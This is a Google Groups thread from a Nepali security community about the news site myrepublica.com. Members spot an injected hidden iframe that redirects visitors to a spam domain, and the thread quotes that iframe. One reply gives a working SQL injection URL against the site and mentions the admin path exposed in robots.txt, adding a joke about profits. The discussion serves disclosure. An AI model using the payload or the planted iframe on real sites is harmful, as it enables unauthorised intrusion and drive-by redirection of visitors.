MyRepublica website seems to be compromised.

48 views
Skip to first unread message

bibeks...@gmail.com

unread,
Dec 13, 2012, 10:46:05 AM12/13/12
to neps...@googlegroups.com
When browsing myrepublica website, saw that it didn't stop loading pages.
A quick look at the html source looks like the site has been compromised.

Anyone knows any idea how to get to the developers of myrepublica? I tried posting it on their facebook page but to no response.


--
Bibek Shrestha
bibekshrestha at gmail dot com
Twitter: http://twitter.com/bibstha
"You mustn't be afraid to dream a little bigger, darling.", Eames to Arthur, Inception 2010

Bipin Gautam

unread,
Dec 18, 2012, 12:47:32 AM12/18/12
to neps...@googlegroups.com
Hi,

Any Proof of concept ? Screenshot ? Please back your claim with some
evidence. :)

Thanks,
-bipin
> --
> You received this message because you are subscribed to the Google Groups
> "NepSecure (Nepali computer security and hacking community )" group.
>
> LEGAL DISCLAIMER:
> https://groups.google.com/group/nepsecure/msg/def6373e6378d035
>
>

rhoit

unread,
Dec 18, 2012, 12:48:52 AM12/18/12
to neps...@googlegroups.com
seems ok! opening fine!

bibstha

unread,
Dec 18, 2012, 9:27:51 AM12/18/12
to neps...@googlegroups.com, the....@gmail.com
Take a look at the source of myrepublica.com





<iframe width="3" height="3" frameborder="0" src="http://click.k8877.org/feed/xml.php?uid=232&frames=3"></iframe>
</body>

and click.k8877.org is a spamming site that redirects you on and on to different websites.

Does myrepublica.com stop loading? For me in chrome, it does not stop loading, the last script keeps on redirecting me to different websites.

On Tuesday, December 18, 2012 6:48:52 AM UTC+1, Rho wrote:
seems ok! opening fine!

Samar Dhwoj Acharya

unread,
Jan 26, 2013, 11:08:16 AM1/26/13
to neps...@googlegroups.com, the....@gmail.com
SQL Injection exists in the site. (Check this: http://www.myrepublica.com/portal/index.php?action=pages&page_id=-9999+union+all+select+1,2,@@version,4,5)

And, too bad robots.txt reveals the admin url (acccess admin panel @ /adminsite/). Then, iframe injection, defacements, etc... Profits :D
The thing to be noted is that it is one of the high traffic sites from Nepal.

Samar Dhwoj Acharya

unread,
Jan 26, 2013, 11:20:24 AM1/26/13
to neps...@googlegroups.com, the....@gmail.com
& I guess Iframe injection has been fixed. Can't see anything:

$  wget http://myrepublica.com -O - | grep iframe


On Tuesday, December 18, 2012 8:12:51 PM UTC+5:45, bibstha wrote:
Reply all
Reply to author
Forward
0 new messages